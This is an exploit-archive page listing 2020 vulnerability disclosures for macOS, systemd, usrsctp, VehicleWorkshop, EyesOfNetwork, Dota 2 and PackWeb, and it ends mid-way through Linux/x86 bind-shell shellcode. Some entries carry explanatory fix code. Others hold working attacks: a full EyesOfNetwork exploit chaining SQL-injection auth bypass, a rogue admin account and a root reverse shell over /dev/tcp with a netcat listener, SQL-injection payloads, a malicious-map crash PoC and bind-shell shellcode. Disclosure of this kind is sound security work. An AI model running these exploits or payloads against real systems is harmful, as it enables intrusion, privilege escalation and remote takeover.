
macOS/iOS kern_stack_snapshot_internal() Userspace Share Issue


macOS and iOS suffer from an issue where kern_stack_snapshot_internal() shares non-zeroed kernel pages with userspace.


MD5 | 9ba8ef3758b3008ca2cd79dcec2effb0



XNU IOUserClient::_sendAsyncResult64() ipc_port Pointer Disclosure


The XNU function IOUserClient::_sendAsyncResult64() discloses the address of the ipc_port to which the notification is sent in the Mach message enqueued on the notification port.


MD5 | 6ecb90fde4136a6abb3c8382394b9ae5


systemd-machined Incorrect Reference Decrement


systemd has an issue in systemd-machined where it decrements the reference count when references are still held.


MD5 | 892461d03b79e21e6c1303c5d998422e

systemd: systemd-machined decrements reference count when references still held

I've been looking at the version of systemd shipped in Fedora 31 (approximately ef677436aa203c24816021dd698b57f219f0ff64)

I noticed that systemd-machined caches image objects, and uses reference counting to keep track of them. It removes a reference on error, but it still has a reference in the slot, and you can make it require it by requesting a reply.

For example, a remote non-admin can do this, and it is handled correctly (i.e. correctly denied):

$ dbus-send --system --dest=org.freedesktop.machine1 /org/freedesktop/machine1/image/_2ehost org.freedesktop.machine1.Image.Clone string:invalid boolean:false

But if we request a reply:

$ dbus-send --print-reply --system --dest=org.freedesktop.machine1 /org/freedesktop/machine1/image/_2ehost org.freedesktop.machine1.Image.Clone string:invalid boolean:false

Program received signal SIGSEGV, Segmentation fault.
0x0000556c14d58a69 in bus_image_method_clone (message=0x556c152db930, userdata=0x556c152dbcc0, error=0x7ffd8471c9b0) at ../src/machine/image-dbus.c:144
(gdb) p *image
$2 = {n_ref = 16843372, type = 16, name = 0x360000062b <error: Cannot access memory at address 0x360000062b>,
etc }

image has already hit zero references, and was released. Maybe this affects other objects as well.

I suppose the fix is to check the header for NO_REPLY_EXPECTED, and give it a second reference if not set, but the logic is complicated and maybe you prefer another way.

(To be clear, this is enabled by default on FC31 and accessible to remote, untrusted users)

Tavis.


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.





Found by: taviso@google.com
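A model of the ownership mistake in the report above, as an added example (not systemd code): the Image type, the one-slot cache and the two clone handlers are hypothetical stand-ins for machined's image cache and bus_image_method_clone(), and free() is replaced by a destroyed flag so the stale pointer left behind can be inspected. The buggy handler drops a reference it only borrowed; the fixed one takes its own reference for the duration of the call, which is one way to realise the extra reference the reporter suggests.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

typedef struct Image {
    unsigned n_ref;      /* owners of this object; the cache is one of them */
    bool destroyed;      /* set once the last reference is dropped */
    char name[32];
} Image;

/* Hypothetical one-slot image cache. It owns exactly one reference. */
static Image image_storage;
static Image *cache_slot;
/* Reply text written by the handlers (stands in for the bus reply message). */
static char reply_buf[64];

static void cache_reset(const char *name)
{
    memset(&image_storage, 0, sizeof image_storage);
    snprintf(image_storage.name, sizeof image_storage.name, "%s", name);
    image_storage.n_ref = 1;            /* the cache's own reference */
    cache_slot = &image_storage;
}

static Image *image_ref(Image *i)
{
    if (i)
        i->n_ref++;
    return i;
}

/* Drops one reference. At zero the object is destroyed; instead of free() we
 * set a flag and zero the fields so a stale pointer can still be examined. */
static Image *image_unref(Image *i)
{
    if (i && --i->n_ref == 0) {
        i->destroyed = true;
        memset(i->name, 0, sizeof i->name);
    }
    return NULL;
}

static bool clone_name_ok(const char *n)
{
    return n && n[0] != '\0' && strcmp(n, "invalid") != 0;
}

/* BUGGY (the shape of the report): the handler only borrows the cache's
 * pointer, yet on error it drops a reference it never took. When the caller
 * asked for a reply, that reply is then built from the destroyed object. */
static int method_clone_buggy(const char *new_name, bool want_reply,
                              char *reply, size_t reply_len)
{
    Image *image = cache_slot;                          /* borrowed, not owned */

    if (!clone_name_ok(new_name)) {
        image_unref(image);                             /* BUG: not ours to drop */
        if (want_reply)
            snprintf(reply, reply_len, "cannot clone '%s'", image->name);
        return -EINVAL;
    }
    snprintf(reply, reply_len, "cloned '%s' to '%s'", image->name, new_name);
    return 0;
}

/* FIXED: take a reference for the lifetime of the call and release exactly
 * that one on every path, so the cache's reference is never touched. */
static int method_clone_fixed(const char *new_name, bool want_reply,
                              char *reply, size_t reply_len)
{
    Image *image = image_ref(cache_slot);               /* now we own one */
    int r = 0;

    if (!clone_name_ok(new_name)) {
        if (want_reply)
            snprintf(reply, reply_len, "cannot clone '%s'", image->name);
        r = -EINVAL;
    } else {
        snprintf(reply, reply_len, "cloned '%s' to '%s'", image->name, new_name);
    }
    image_unref(image);                                 /* release only our reference */
    return r;
}

int main(void)
{
    cache_reset(".host");
    method_clone_buggy("invalid", true, reply_buf, sizeof reply_buf);
    printf("buggy: cached object destroyed=%d, reply=\"%s\"\n",
           cache_slot->destroyed, reply_buf);
    cache_reset(".host");
    method_clone_fixed("invalid", true, reply_buf, sizeof reply_buf);
    printf("fixed: cached object destroyed=%d, n_ref=%u, reply=\"%s\"\n",
           cache_slot->destroyed, cache_slot->n_ref, reply_buf);
    return 0;
}
```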



macOS/iOS IOAccelCommandQueue2::processSegmentKernelCommand() Out-Of-Bounds Timestamp Write


macOS and iOS suffer from an out-of-bounds timestamp write in IOAccelCommandQueue2::processSegmentKernelCommand().


MD5 | 04c093e6bde68cbe168364f56f38b9ee


usrsctp sctp_load_addresses_from_init Out-Of-Bounds Read


usrsctp is an SCTP library used by a variety of software, including WebRTC. A vulnerability in the sctp_load_addresses_from_init function of usrsctp can lead to a number of out-of-bounds reads. The input to sctp_load_addresses_from_init is verified by calling sctp_arethere_unrecognized_parameters; however, the two functions handle parameter bounds differently. sctp_arethere_unrecognized_parameters does not process a parameter that is partially outside the limit of the chunk, whereas sctp_load_addresses_from_init continues processing until it reaches a parameter that is entirely outside the chunk. This means the last parameter of a chunk is not always verified, so parameters with very short plen values can reach sctp_load_addresses_from_init, which leads to out-of-bounds reads wherever plen is subtracted from the header length.


MD5 | f7629110af96666d0b8af7e76ecfa60d
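Added example, not usrsctp code: a single bounds-checked parameter walker that a validation pass and an address-loading pass can share, so both stop at the same place. It rejects a trailing parameter that is only partially inside the chunk and any plen shorter than its own header, the two inputs the summary above describes. The parameter layout (2-byte type, 2-byte length that includes the header, 4-byte padding) follows the SCTP TLV format; the chunk bytes are constructed here.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PARAM_HDR_LEN 4u

typedef void (*param_visitor)(uint16_t type, const uint8_t *value,
                              size_t vlen, void *ctx);

/* Reads a 16-bit big-endian field. */
static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Visits every parameter in chunk[0..chunk_len). Returns the number of
 * parameters, or -1 at the first one that does not lie entirely inside the
 * chunk or whose length is shorter than its own header. A validator and a
 * consumer that both use this loop cannot disagree about the last parameter. */
static int walk_params(const uint8_t *chunk, size_t chunk_len,
                       param_visitor visit, void *ctx)
{
    size_t off = 0;
    int count = 0;

    while (off < chunk_len) {
        size_t remaining = chunk_len - off;
        if (remaining < PARAM_HDR_LEN)
            return -1;                      /* the header itself does not fit */
        uint16_t plen = rd16(chunk + off + 2);
        if (plen < PARAM_HDR_LEN)
            return -1;                      /* plen - header would underflow */
        if (plen > remaining)
            return -1;                      /* partially outside the chunk */
        if (visit)
            visit(rd16(chunk + off), chunk + off + PARAM_HDR_LEN,
                  plen - PARAM_HDR_LEN, ctx);
        count++;
        off += ((size_t)plen + 3u) & ~(size_t)3u;   /* advance past padding */
    }
    return count;
}

/* Validation pass: only checks structure. */
static int count_params(const uint8_t *chunk, size_t chunk_len)
{
    return walk_params(chunk, chunk_len, NULL, NULL);
}

/* Loading pass: counts IPv4 Address parameters (type 5, 4-byte value). */
static void ipv4_counter(uint16_t type, const uint8_t *value, size_t vlen, void *ctx)
{
    (void)value;
    if (type == 5 && vlen == 4)
        (*(int *)ctx)++;
}

static int count_ipv4_addrs(const uint8_t *chunk, size_t chunk_len)
{
    int n = 0;
    if (walk_params(chunk, chunk_len, ipv4_counter, &n) < 0)
        return -1;
    return n;
}

/* Constructed sample chunks (parameter bodies only, no chunk header). */
static const uint8_t good_chunk[] = {
    0x00, 0x05, 0x00, 0x08, 0xc0, 0xa8, 0x01, 0x02,   /* IPv4 Address, len 8 */
    0x00, 0x0c, 0x00, 0x06, 0x00, 0x05, 0x00, 0x00,   /* Supported Addr Types, len 6 + pad */
};
static const uint8_t short_plen_chunk[] = {
    0x00, 0x05, 0x00, 0x08, 0xc0, 0xa8, 0x01, 0x02,
    0x00, 0x05, 0x00, 0x02,                           /* plen 2 < header length */
};
static const uint8_t partial_chunk[] = {
    0x00, 0x05, 0x00, 0x08, 0xc0, 0xa8, 0x01, 0x02,
    0x00, 0x05, 0x00, 0x08, 0xc0, 0xa8,               /* claims 8 bytes, only 6 present */
};

int main(void)
{
    printf("good: %d params, %d IPv4 addresses\n",
           count_params(good_chunk, sizeof good_chunk),
           count_ipv4_addrs(good_chunk, sizeof good_chunk));
    printf("short plen: %d\n", count_params(short_plen_chunk, sizeof short_plen_chunk));
    printf("partial trailing: %d\n", count_params(partial_chunk, sizeof partial_chunk));
    return 0;
}
```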


VehicleWorkshop 1.0 SQL Injection


VehicleWorkshop version 1.0 suffers from a remote SQL injection vulnerability.


MD5 | 33a32b45912823606ad609e132b4f519

# Exploit Title: VehicleWorkshop 1.0 - 'bookingid' SQL Injection
# Date: 2020-02-06
# Exploit Author: Mehran Feizi
# Vendor Homepage: https://github.com/spiritson/VehicleWorkshop
# Tested on: Windows
# Google Dork: N/A


=========
Vulnerable Page:
=========
/viewtestdrive.php


==========
Vulnerable Source:
==========
Line6: if(isset($_GET['testid']))
Line8: $results = mysql_query("DELETE from testdrive where bookingid ='$_GET[testid]'");
Line11: if(isset($_GET['testbid']))
Line13: $results = mysql_query("UPDATE testdrive SET status='Approved' where bookingid ='$_GET[testbid]'");
Line16: if(isset($_GET['testbida']))
Line18: $results = mysql_query("UPDATE testdrive SET status='Rejected' where bookingid ='$_GET[testbida]'");

=========
POC:
=========
http://site.com/viewtestdrive.php?bookingid=[SQL]

EyesOfNetwork 5.3 Remote Code Execution


EyesOfNetwork version 5.3 suffers from code execution and remote SQL injection vulnerabilities.


MD5 | bc3327dd510c720ed37f54d8f81edded

# Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution
# Date: 2020-02-01
# Exploit Author: Clément Billac
# Vendor Homepage: https://www.eyesofnetwork.com/
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3
# CVE : CVE-2020-8654, CVE-2020-8655, CVE-2020-8656

#!/bin/env python3
# coding: utf8
#
#
# CVE-2020-8654 - Discovery module allows running arbitrary OS commands
# We were able to run the 'id' command with the following payload in the target field : ';id #'.
#
# CVE-2020-8655 - LPE via nmap NSE script
# As the apache user is allowed to run nmap as root, we were able to execute arbitrary commands by providing a specially crafted NSE script.
# nmap version 6.40 is used and doesn't have the -c and -e options.
#
# CVE-2020-8656 - SQLi in API in getApiKey function on 'username' field
# PoC: /eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '
# Auth bypass: /eonapi/getApiKey?&username=' union select 1,'admin','1c85d47ff80b5ff2a4dd577e8e5f8e9d',0,0,1,1,8 or '&password=h4knet

# Python imports
import sys, requests, json, os, argparse, socket
from bs4 import BeautifulSoup

# Text colors
txt_yellow = "\033[01;33m"
txt_blue = "\033[01;34m"
txt_red = "\033[01;31m"
txt_green = "\033[01;32m"
txt_bold = "\033[01;01m"
txt_reset = "\033[00m"
txt_info = txt_blue + "[*] " + txt_reset
txt_success = txt_green + "[+] " + txt_reset
txt_warn = txt_yellow + "[!] " + txt_reset
txt_err = txt_red + "[x] " + txt_reset

# Banner
banner = (txt_bold + """
+-----------------------------------------------------------------------------+
| EyesOfNetwork 5.3 RCE (API v2.4.2) |
| 02/2020 - Clément Billac \033[01;34mTwitter: @h4knet\033[00m |
| |
| Examples: |
| eonrce.py -h |
| eonrce.py http(s)://EyesOfNetwork-URL |
| eonrce.py https://eon.thinc.local -ip 10.11.0.182 -port 3128 |
| eonrce.py https://eon.thinc.local -ip 10.11.0.182 -user pentest2020 |
+-----------------------------------------------------------------------------+
""" + txt_reset)

# Arguments Parser
parser = argparse.ArgumentParser("eonrce", formatter_class=argparse.RawDescriptionHelpFormatter, usage=banner)
parser.add_argument("URL", metavar="URL", help="URL of the EyesOfNetwork server")
parser.add_argument("-ip", metavar="IP", help="Local IP to receive reverse shell", default=socket.gethostbyname(socket.gethostname()))
parser.add_argument("-port", metavar="Port", type=int, help="Local port to listen", default=443)
parser.add_argument("-user", metavar="Username", type=str, help="Name of the new user to create", default='h4ker')
parser.add_argument("-password", metavar="Password", type=str, help="Password of the new user", default='net_was_here')
args = parser.parse_args()

# HTTP Requests config
requests.packages.urllib3.disable_warnings()
baseurl = sys.argv[1].strip('/')
url = baseurl
useragent = 'Mozilla/5.0 (Windows NT 1.0; WOW64; rv:13.37) Gecko/20200104 Firefox/13.37'

# Admin user creation variables
new_user = args.user
new_pass = args.password

# Executed command
# The following payload performs both the LPE and the reverse shell in a single command.
# It creates an NSE script in /tmp/h4k which executes /bin/sh with a reverse shell, then performs the nmap scan on localhost with the created NSE script.
# Readable PoC: ;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end"> /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #
ip = args.ip
port = str(args.port)
cmd = '%3Becho+%22local+os+%3D+require+%5C%22os%5C%22+hostrule%3Dfunction%28host%29+os.execute%28%5C%22%2Fbin%2Fsh+-i+%3E%26+%2Fdev%2Ftcp%2F' + ip + '%2F' + port + '+0%3E%261%5C%22%29+end+action%3Dfunction%28%29+end%22+%3E+%2Ftmp%2Fh4k%3Bsudo+%2Fusr%2Fbin%2Fnmap+localhost+-p+1337+-script+%2Ftmp%2Fh4k+%23'

# Exploit banner
print (txt_bold,"""+-----------------------------------------------------------------------------+
| EyesOfNetwork 5.3 RCE (API v2.4.2) |
| 02/2020 - Clément Billac \033[01;34mTwitter: @h4knet\033[00m |
+-----------------------------------------------------------------------------+
""", txt_reset, sep = '')

# Check if it's a EyesOfNetwork login page.
r = requests.get(baseurl, verify=False, headers={'user-agent':useragent})
if r.status_code == 200 and r.text.find('<title>EyesOfNetwork</title>') != -1 and r.text.find('form action="login.php" method="POST">') != -1:
    print(txt_info, "EyesOfNetwork login page found", sep = '')
else:
    print(txt_err, 'EyesOfNetwork login page not found', sep = '')
    quit()

# Check for accessible EON API
url = baseurl + '/eonapi/getApiKey'
r = requests.get(url, verify=False, headers={'user-agent':useragent})
if r.status_code == 401 and 'api_version' in r.json().keys() and 'http_code' in r.json().keys():
    print(txt_info, 'EyesOfNetwork API page found. API version: ',txt_bold , r.json()['api_version'], txt_reset, sep = '')
else:
    print(txt_warn, 'EyesOfNetwork API page not found', sep = '')
    quit()

# SQL injection with authentication bypass
url = baseurl + '/eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet'
r = requests.get(url, verify=False, headers={'user-agent':useragent})
if r.status_code == 200 and 'EONAPI_KEY' in r.json().keys():
    print(txt_success, 'Admin user key obtained: ', txt_bold, r.json()['EONAPI_KEY'], txt_reset, sep = '')
else:
    print(txt_err, 'The host seems patched or unexploitable', sep = '')
    print(txt_warn, 'Did you specify http instead of https in the URL?', sep = '')
    print(txt_warn, 'You can check the SQLi manually with the following payload: ', txt_bold, "/eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '", txt_reset, sep = '')
    quit()

# Adding new administrator
url = sys.argv[1].strip('/') + '/eonapi/createEonUser?username=admin&apiKey=' + r.json()['EONAPI_KEY']
r = requests.post(url, verify=False, headers={'user-agent':useragent}, json={"user_name":new_user,"user_group":"admins","user_password":new_pass})
if r.status_code == 200 and 'result' in r.json().keys():
    if r.json()['result']['code'] == 0 and 'SUCCESS' in r.json()['result']['description']:
        id = r.json()['result']['description'].split('ID = ', 1)[1].split(']')[0]
        print(txt_success, 'New user ', txt_bold, new_user, txt_reset, ' successfully created. ID:', txt_bold, id, txt_reset, sep = '')

    elif r.json()['result']['code'] == 1:
        if ' already exist.' in r.json()['result']['description']:
            print(txt_warn, 'The user ', txt_bold, new_user, txt_reset, ' already exists', sep = '')
        else:
            print(txt_err, 'An error occurred while querying the API. Unexpected description message: ', txt_bold, r.json()['result']['description'], txt_reset, sep = '')
            quit()
    else:
        print(txt_err, 'An error occurred while querying the API. Unexpected result code. Description: ', txt_bold, r.json()['result']['description'], txt_reset, sep = '')
        quit()
else:
    print(txt_err, 'An error occurred while querying the API. Missing result value in JSON response or unexpected HTTP status response', sep = '')
    quit()

# Authentication with our new user
url = baseurl + '/login.php'
auth_data = 'login=' + new_user + '&mdp=' +new_pass
auth_req = requests.post(url, verify=False, headers={'user-agent':useragent,'Content-Type':'application/x-www-form-urlencoded'}, data=auth_data)
if auth_req.status_code == 200 and 'Set-Cookie' in auth_req.headers:
    print(txt_success, 'Successfully authenticated', sep = '')
else:
    print(txt_err, 'Error while authenticating. We expect to receive Set-Cookie headers upon successful authentication', sep = '')
    quit()

# Creating Discovery job
url = baseurl + '/lilac/autodiscovery.php'
job_command = 'request=autodiscover&job_name=Internal+discovery&job_description=Internal+EON+discovery+procedure.&nmap_binary=%2Fusr%2Fbin%2Fnmap&default_template=&target%5B2%5D=' + cmd
r = requests.post(url, verify=False, headers={'user-agent':useragent,'Content-Type':'application/x-www-form-urlencoded'}, cookies=auth_req.cookies, data=job_command)
if r.status_code == 200 and r.text.find('Starting...') != -1:
    job_id = str(BeautifulSoup(r.content, "html.parser").find(id="completemsg")).split('?id=', 1)[1].split('&rev')[0]
    print(txt_success, 'Discovery job successfully created with ID: ', txt_bold, job_id, txt_reset, sep = '')
else:
    print(txt_err, 'Error while creating the discovery job', sep = '')
    quit()

# Launching listener
print(txt_info, 'Spawning netcat listener:', txt_bold)
nc_command = '/usr/bin/nc -lnvp' + port + ' -s ' + ip
os.system(nc_command)
print(txt_reset)

# Removing job
url = baseurl + '/lilac/autodiscovery.php?id=' + job_id + '&delete=1'
r = requests.get(url, verify=False, headers={'user-agent':useragent}, cookies=auth_req.cookies)
if r.status_code == 200 and r.text.find('Removed Job') != -1:
    print(txt_info, 'Job ', job_id, ' removed', sep = '')
else:
    print(txt_err, 'Error while removing the job', sep = '')
    quit()

Dota 2 7.23f Denial Of Service


Dota 2 version 7.23f suffers from a denial of service vulnerability.


MD5 | 2e6effeebad9ec3e55d55eb48ed417cb

# Exploit Title: Dota 2 7.23f - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2020-02-05
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com) (bi7s)
# Vendor Homepage: https://www.valvesoftware.com/en/
# Software Link: N/A
# Version: 7.23f
# Tested on: Windows 10 (x64)
# CVE : CVE-2020-7949


Valve Dota 2 (schemasystem.dll) before 7.23f allows remote attackers to
achieve code execution or denial of service by creating a gaming server and
inviting a victim to this server, because a crafted map is mishandled
during a GetValue call.

The attacker needs to invite a victim to play on the attacker's game server
using a specially crafted map, or create a custom game; then, when the
victim's game initializes, the specially crafted map is automatically
downloaded and processed by the victim, which makes it possible to exploit
the vulnerability. The attacker can also create a custom map and upload it to Steam
<https://steamcommunity.com/sharedfiles/filedetails/?id=328258382>.
Steps to reproduce:

1. Copy the attached file zuff.vpk (
https://github.com/bi7s/CVE/blob/master/CVE-2020-7949/zuff.zip) to the map
directory (C:\Program Files (x86)\Steam\steamapps\common\dota 2
beta\game\dota\maps)
2. Launch Dota2
3. Launch the "zuff" map from the Dota2 game console. Command for game console =
map zuff
4. Dota2 crashes (Access Violation)

Debug information:

(2098.1634): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for C:\Program Files (x86)\Steam\steamapps\common\dota 2
beta\game\bin\win64\schemasystem.dll -
(2098.1634): Access violation - code c0000005 (!!! second chance !!!)
rax=00000000ffffffff rbx=0000027ba23dd9b6 rcx=0000027ba23dd9b6
rdx=0000000042424242 rsi=0000027b5ffb9774 rdi=0000000000000000
rip=00007ffa73af90ce rsp=000000e82bcfe900 rbp=0000000000000000
r8=00000000412ee51c r9=000000e82bcfea88 r10=0000027b5ffb9774
r11=00000000412ee51c r12=0000027b5ffbe582 r13=000000e82bcfe9f0
r14=0000027b5ffb5328 r15=0000000000000010
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
schemasystem!BinaryProperties_GetValue+0x10ae:
00007ffa`73af90ce 40383b cmp byte ptr [rbx],dil
ds:0000027b`a23dd9b6=??

PackWeb Formap E-learning 1.0 SQL Injection


PackWeb Formap E-learning version 1.0 suffers from a remote SQL injection vulnerability.


MD5 | 6c1dbdb44fb300528dd1ae9b45081486

# Exploit Title: PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection
# Google Dork: intitle: "PackWeb Formap E-learning"
# Date: 2020-02-07
# Exploit Author: Amel BOUZIANE-LEBLOND
# Vendor Homepage: https://www.ediser.com/
# Software Link: https://www.ediser.com/98517-formation-en-ligne
# Version: v1.0
# Tested on: Linux
# CVE : N/A

# Description:
# The PackWeb Formap E-learning application from EDISER is vulnerable to
# SQL injection via the 'NumCours' parameter on the eleve_cours.php page.

==================== 1. SQLi ====================

http://localhost/eleve_cours.php?NumCours=[SQLI]

The 'NumCours' parameter is vulnerable to SQL injection.

GET parameter 'NumCours' is vulnerable.

---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://localhost/eleve_cours.php?NumCours=-9758' OR 6342=6342-- rSaq&static=1

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)
Payload: http://localhost/eleve_cours.php?NumCours=' AND SLEEP(5)-- rGcs&static=1

Type: UNION query
Title: MySQL UNION query (47) - 1 column
Payload: http://localhost/eleve_cours.php?NumCours=' UNION ALL SELECT CONCAT(0x7176707171,0x58794e58714e52434d7879444262574a506d6f41526e636444674d5a6863667a6943517841654d54,0x717a7a6a71)#&static=1
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

Linux/x86 Bind Shell Generator Shellcode


A 114 byte Linux/x86 bind shell generator shellcode.


MD5 | 9b7bafc7ff4aa9cacdbde1039bca23ca

# Title: Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
# Author: Bobby Cooke
# Date: 2020-01-29
# Tested On: Ubuntu 3.13.0-32-generic #57~precise1-Ubuntu i386

#!/usr/bin/python

# Take the user's TCP port as input
port = raw_input("Enter TCP Port Number: ")
# Convert the input string to an integer
deciPort = int(port)
if not 1 <= deciPort <= 65535:
    print "Port must be between 1 and 65535."
    exit(0)
# Format the integer as four hex digits (two bytes, network byte order), so a
# port below 0x100 keeps its leading zero byte instead of shrinking to one byte
hexPort = "{:04x}".format(deciPort)
# converts the port number into the correct hex format
tcpPort = "\\x".join(hexPort[i:i+2] for i in range(0,len(hexPort), 2))
print "Your TCP Port in Hex is:","\\x"+tcpPort
# Either byte of the port being 0x00 would terminate the shellcode early
if deciPort % 256 == 0 or deciPort < 256:
    print "Your TCP Port contains a Null 0x00."
    print "Try again with a different Port Number."
    exit(0)

# 1. Create a new Socket
# <socketcall> ipv4Socket = socket( AF_INET, SOCK_STREAM, 0 );
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart1 = "\x31\xc0" # xor eax, eax; This sets the EAX Register to NULL (all zeros).
scPart1 += "\xb0\x66" # mov al, 0x66; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart1 += "\x31\xdb" # xor ebx, ebx; This sets the EBX Register to NULL (all zeros).
scPart1 += "\xb3\x01" # mov bl, 0x1; EBX is set to create a socket
scPart1 += "\x31\xc9" # xor ecx, ecx; This sets the ECX Register to NULL (all zeros).
scPart1 += "\x51" # push ecx; ECX[2]. ECX is NULL
scPart1 += "\x53" # push ebx; ECX[1]. EBX already has the value we need for ECX[1]
scPart1 += "\x6a\x02" # push dword 0x2 ; ECX[0]. Push the value 2 onto the stack, needed for AF_INET.
scPart1 += "\x89\xe1" # mov ecx, esp ; ECX now holds the pointer to the arg array
scPart1 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes socket().
scPart1 += "\x96" # xchg esi, eax ; After the SYSCAL, sockfd is stored in the EAX Register, save in ESI

# 2. Create TCP-IP Address and Bind the Address to the Socket
# struct sockaddr_in ipSocketAddr = {
# .sin_family = AF_INET, .sin_port = htons(4444), .sin_addr.s_addr = INADDR_ANY};
# ARG[0] ARG[1] ARG[2]
#<socketcall> bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart1 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart1 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart1 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart1 += "\xb3\x02" # mov bl, 0x2 ; EBX is set to bind().
scPart1 += "\x31\xd2" # xor edx, edx ; This sets the EDX Register to NULL (all zeros).
scPart1 += "\x52" # push edx ; ARG[2]. EDX is NULL, the value needed for INADDR_ANY.
scPart1 += "\x66\x68" # push word 0x?? ; ; ARG[1]. This is for the TCP Port #
#tcpPort = "\x11\x5c" # TCP Port 4444 = 0x5c11
scPart2 = "\x66\x53" # push bx ; ARG[0]. Push the value 2 onto the stack, needed for AF_INET.
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x89\xe1" # mov ecx, esp ; Save the memory location of ARG[0] (the start of the sockaddr struct) into the ECX Register.
scPart2 += "\x6a\x10" # push 0x10 ; ECX[2]. Our Struct of ARG's is now 16 bytes long (0x10 in Hex).
scPart2 += "\x51" # push ecx ; ECX[1]. The pointer to the beginning of the struct we saved
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Now we need to point ECX to the top of the loaded stack.
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80

# 4. Listen for incoming connections on TCP-IP Socket.
# <socketcall> listen( ipv4Socket, 0 );
# EAX=0x66 EBX ECX[0] ECX[1]
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart2 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart2 += "\xb3\x04" # mov bl, 0x4 ; EBX is set to listen().
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x51" # push ecx ; ECX[1]. Push the value 0x0 to the stack.
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Point ECX to the top of the stack.
scPart2 += "\xcd\x80" # int 0x80 ; Executes listen(). Allowing us to handle incoming TCP-IP Connections.

# 5. Accept the incoming connection, and create a connected session.
# <socketcall> clientSocket = accept( ipv4Socket, NULL, NULL );
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart2 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart2 += "\xb3\x05" # mov bl, 0x5 ; EBX is set to accept().
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x51" # push ecx ; ECX[2]. Push the value 0x0 to the stack.
scPart2 += "\x51" # push ecx ; ECX[1]. Push the value 0x0 to the stack.
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Point ECX to the top of the stack.
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80
scPart2 += "\x93" # xchg ebx, eax ; The created clientSocket is stored in EAX after receiving a connection.

# 6. Transfer STDIN, STDOUT, STDERR to the connected Socket.
# dup2( clientSocket, 0 ); // STDIN
# dup2( clientSocket, 1 ); // STDOUT
# dup2( clientSocket, 2 ); // STDERR
# EAX EBX ECX
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\xb1\x02" # mov cl, 0x2 ; This sets the loop counter, and
# ; will also be the value of "int newfd" for the 3 dup2 SYSCAL's.
#dup2Loop: ; Procedure label for the dup2 Loop.
scPart2 += "\xb0\x3f" # mov al, 0x3f ; EAX is now 0x0000003F = SYSCALL 63 - dup2
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes dup2().
# ; Redirects the fd in ECX (2, then 1, then 0) to the client socket in EBX.
scPart2 += "\x49" # dec ecx ; Decrements ECX by 1
scPart2 += "\x79\xf9" # jns dup2Loop / jns short -7 ; Jump back to dup2Loop while ECX is not negative (runs for 2, 1 and 0).

# 7. Spawn a "/bin/sh" shell for the client, in the connected session.
# execve("/bin//sh", NULL, NULL);
# EAX EBX ECX EDX
scPart2 += "\x52" # push edx ; Push NULL to terminate the string.
